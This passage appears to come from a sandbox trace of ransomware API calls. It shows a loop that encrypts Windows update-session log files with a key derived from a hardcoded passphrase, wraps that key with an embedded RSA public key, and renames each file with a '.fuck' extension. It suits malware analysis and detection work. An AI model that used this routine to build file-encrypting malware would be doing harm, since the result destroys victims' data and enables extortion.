"c:\\programdata\\usoshared\\logs\\updatesessionorchestration.013.etl"), bFailIfExists=0) returned 0 [0238.561] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl", dwFileAttributes=0x2000) returned 0 [0238.561] DeleteFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.013.etl.gsg")) returned 1 [0238.562] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.013.etl"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl.fuck" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.013.etl.fuck")) returned 0 [0238.562] CryptDestroyHash (hHash=0x282dcf8) returned 1 [0238.562] CryptDestroyKey (hKey=0x282dfb8) returned 1 [0238.562] CryptReleaseContext (hProv=0x2880528, dwFlags=0x0) returned 1 [0238.562] FindNextFileA (in: hFindFile=0x27ea990, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.563] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0238.563] GetLastError () returned 0x5 [0238.563] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.014.etl")) returned 0x2020 [0238.563] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl", dwFileAttributes=0x80) returned 0 [0238.563] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.014.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.564] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.014.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0238.564] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl.gsg", dwFileAttributes=0x2) returned 1 [0238.564] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x2880528) returned 1 [0238.566] CryptCreateHash (in: hProv=0x2880528, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0238.566] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.566] CryptHashData (hHash=0x282e3f8, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.566] CryptDeriveKey (in: hProv=0x2880528, Algid=0x6610, hBaseData=0x282e3f8, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x282dfb8) returned 1 [0238.566] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.567] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0238.567] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x2880a78) returned 1 [0238.567] CryptImportPublicKeyInfo (in: hCryptProv=0x2880a78, dwCertEncodingType=0x1, pInfo=0x286b4d8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286b508*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286b510*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x282e2f8) returned 1 [0238.567] CryptEncrypt (in: hKey=0x282e2f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0238.567] CryptEncrypt (in: hKey=0x282e2f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x287fb10*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x287fb10*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0238.567] WriteFile (in: hFile=0x5d10, lpBuffer=0x287fb10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x287fb10*, lpNumberOfBytesWritten=0x2b9e074*=0x80, lpOverlapped=0x0) returned 1 [0238.568] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0238.568] CryptEncrypt (in: hKey=0x282dfb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0238.568] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9e074*=0x10, lpOverlapped=0x0) returned 1 [0238.568] CloseHandle (hObject=0xffffffff) returned 1 [0238.568] CloseHandle (hObject=0x5d10) returned 1 [0238.569] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.014.etl.gsg"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.014.etl"), bFailIfExists=0) returned 0 [0238.573] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl", dwFileAttributes=0x2000) returned 0 [0238.573] DeleteFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.014.etl.gsg")) returned 1 [0238.574] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.014.etl"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl.fuck" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.014.etl.fuck")) returned 0 [0238.575] CryptDestroyHash (hHash=0x282e3f8) returned 1 [0238.575] CryptDestroyKey (hKey=0x282dfb8) returned 1 [0238.575] CryptReleaseContext (hProv=0x2880528, dwFlags=0x0) returned 1 [0238.575] FindNextFileA (in: hFindFile=0x27ea990, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.575] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0238.575] GetLastError () returned 0x5 [0238.575] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.015.etl")) returned 0x2020 [0238.576] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl", dwFileAttributes=0x80) returned 0 [0238.576] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.015.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.576] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.015.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0238.579] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl.gsg", dwFileAttributes=0x2) returned 1 [0238.580] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x287fb98) returned 1 [0238.582] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0238.582] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.582] CryptHashData (hHash=0x282df78, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.582] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x282df78, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x282e238) returned 1 [0238.582] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.582] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0238.582] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x2880528) returned 1 [0238.582] CryptImportPublicKeyInfo (in: hCryptProv=0x2880528, dwCertEncodingType=0x1, pInfo=0x286a708*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286a738*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286a740*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x282dd78) returned 1 [0238.582] CryptEncrypt (in: hKey=0x282dd78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0238.583] CryptEncrypt (in: hKey=0x282dd78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2881a68*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x2881a68*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0238.583] WriteFile (in: hFile=0x5d10, lpBuffer=0x2881a68*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2881a68*, lpNumberOfBytesWritten=0x2b9e074*=0x80, lpOverlapped=0x0) returned 1 [0238.584] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0238.584] CryptEncrypt (in: hKey=0x282e238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0238.584] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9e074*=0x10, lpOverlapped=0x0) returned 1 [0238.584] CloseHandle (hObject=0xffffffff) returned 1 [0238.584] CloseHandle (hObject=0x5d10) returned 1 [0238.585] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.015.etl.gsg"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.015.etl"), bFailIfExists=0) returned 0 [0238.588] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl", dwFileAttributes=0x2000) returned 0 [0238.590] DeleteFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.015.etl.gsg")) returned 1 [0238.592] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.015.etl"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl.fuck" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.015.etl.fuck")) returned 0 [0238.592] CryptDestroyHash (hHash=0x282df78) returned 1 [0238.592] CryptDestroyKey (hKey=0x282e238) returned 1 [0238.592] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0238.592] FindNextFileA (in: hFindFile=0x27ea990, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.592] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0238.592] GetLastError () returned 0x5 [0238.592] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.016.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.016.etl")) returned 0x2020 [0238.593] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.016.etl", dwFileAttributes=0x80) returned 0 [0238.593] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.016.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.016.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.593] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.016.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.016.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0238.594] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.016.etl.gsg", dwFileAttributes=0x2) returned 1 [0238.594] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x287fb98) returned 1 [0238.597] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0238.597] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.597] CryptHashData (hHash=0x282deb8, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.597] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x282deb8, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x282e338) returned 1 [0238.597] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.597] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0238.597] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x2881af0) returned 1 [0238.597] CryptImportPublicKeyInfo (in: hCryptProv=0x2881af0, dwCertEncodingType=0x1, pInfo=0x286b5a8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286b5d8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286b5e0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x282e378) returned 1 [0238.598] CryptEncrypt (in: hKey=0x282e378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0238.598] CryptEncrypt (in: hKey=0x282e378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2880b00*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x2880b00*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0238.598] WriteFile (in: hFile=0x5d10, lpBuffer=0x2880b00*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2880b00*, lpNumberOfBytesWritten=0x2b9e074*=0x80, lpOverlapped=0x0) returned 1 [0238.599] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0238.599] CryptEncrypt (in: hKey=0x282e338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0238.599] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9e074*=0x10, lpOverlapped=0x0) returned 1 [0238.599] CloseHandle (hObject=0xffffffff) returned 1 [0238.599] CloseHandle (hObject=0x5d10) returned 1 [0238.603] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.016.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.016.etl.gsg"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.016.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.016.etl"), bFailIfExists=0) returned 0 [0238.607] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.016.etl", dwFileAttributes=0x2000) returned 0 [0238.608] DeleteFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.016.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.016.etl.gsg")) returned 1 [0238.609] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.016.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.016.etl"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.016.etl.fuck" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.016.etl.fuck")) returned 0 [0238.609] CryptDestroyHash (hHash=0x282deb8) returned 1 [0238.609] CryptDestroyKey (hKey=0x282e338) returned 1 [0238.609] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0238.609] FindNextFileA (in: hFindFile=0x27ea990, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.609] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0238.609] GetLastError () returned 0x5 [0238.610] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.017.etl")) returned 0x2020 [0238.610] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl", dwFileAttributes=0x80) returned 0 [0238.610] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.017.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.610] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.017.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0238.611] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl.gsg", dwFileAttributes=0x2) returned 1 [0238.611] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x287fb98) returned 1 [0238.614] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0238.614] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.614] CryptHashData (hHash=0x282e238, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.614] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x282e238, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x282e338) returned 1 [0238.614] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.614] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0238.614] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x2881380) returned 1 [0238.615] CryptImportPublicKeyInfo (in: hCryptProv=0x2881380, dwCertEncodingType=0x1, pInfo=0x286b198*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286b1c8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286b1d0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x282dcf8) returned 1 [0238.615] CryptEncrypt (in: hKey=0x282dcf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0238.615] CryptEncrypt (in: hKey=0x282dcf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2881b78*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x2881b78*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0238.615] WriteFile (in: hFile=0x5d10, lpBuffer=0x2881b78*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2881b78*, lpNumberOfBytesWritten=0x2b9e074*=0x80, lpOverlapped=0x0) returned 1 [0238.616] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0238.616] CryptEncrypt (in: hKey=0x282e338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0238.616] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9e074*=0x10, lpOverlapped=0x0) returned 1 [0238.616] CloseHandle (hObject=0xffffffff) returned 1 [0238.616] CloseHandle (hObject=0x5d10) returned 1 [0238.617] CopyFileA 